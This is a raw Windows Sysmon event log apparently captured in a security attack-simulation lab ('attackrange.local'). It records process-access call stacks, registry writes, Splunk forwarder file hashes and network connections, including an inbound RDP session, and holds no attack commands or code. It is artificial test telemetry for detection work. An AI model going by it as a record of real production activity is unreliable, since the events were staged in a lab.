09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D29-6151-8D00-00000000FD01}41364504C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.103{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.025{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.009{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:49.009{5EBD8912-8CC0-6151-1000-00000000FD01}4401640C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.994{5EBD8912-8D2A-6151-9600-00000000FD01}46324432C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.994{5EBD8912-8D2A-6151-9600-00000000FD01}46324432C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.994{5EBD8912-8D2A-6151-9600-00000000FD01}46324432C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.994{5EBD8912-8D2A-6151-9600-00000000FD01}46324432C:\Windows\Explorer.EXE{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:50.666{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3826DC8C414E0FBA169091194BB42840,SHA256=D63CADF5A5435014107DFFB786F038BBFB1C542889888CF424AE1D9BD41BBCB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:47.819{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59516-false10.0.1.12-8000- 23542300x8000000000000000980884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:50.165{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF7F26695688B896BE1DA348BCF08DF,SHA256=74FC0F0B54C49062659ED0B5E33CAF60976825A0107408F00B782C6F04028399,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:50.088{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000001055906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:50.088{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00023975) 13241300x80000000000000001055905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:50.088{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0x134ec0d5) 13241300x80000000000000001055904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:50.088{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b380-0x751328d5) 13241300x80000000000000001055903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:21:50.088{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0xd6d790d5) 10341000x80000000000000001055902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:50.025{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:50.025{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:51.698{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B7BEC58C93AD9E905405A4F396641B,SHA256=61286AFE4A1B413EF2C9994CB659FF667C63C994E36796E9F1C3655F73B252C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:48.794{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64692-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:51.509{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1620985C34012E2319E93FC98FC0E773,SHA256=595B8DED266CEA1A9885B984637A49F27B68E49D67069288372E3B36BEBADA4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:51.228{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4F1AB2F319821C92F5D792F51E2EC1,SHA256=0DD054FD582EE372D58DE6B3E55C925D8C7CAE6919886E48089D913B56CD6861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.932{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28230346C7238E19E624579EDBBE1DA1,SHA256=96AFBBE5808A957974B72A956EBE9956CDDB374357F7E5272F09CC195E3D37E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:52.244{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D548A12B8385EA10734C261E83900EF,SHA256=44797197F8157EF9108B99250908641FB53827B9DC569B557F47DF31F552E956,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.338{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 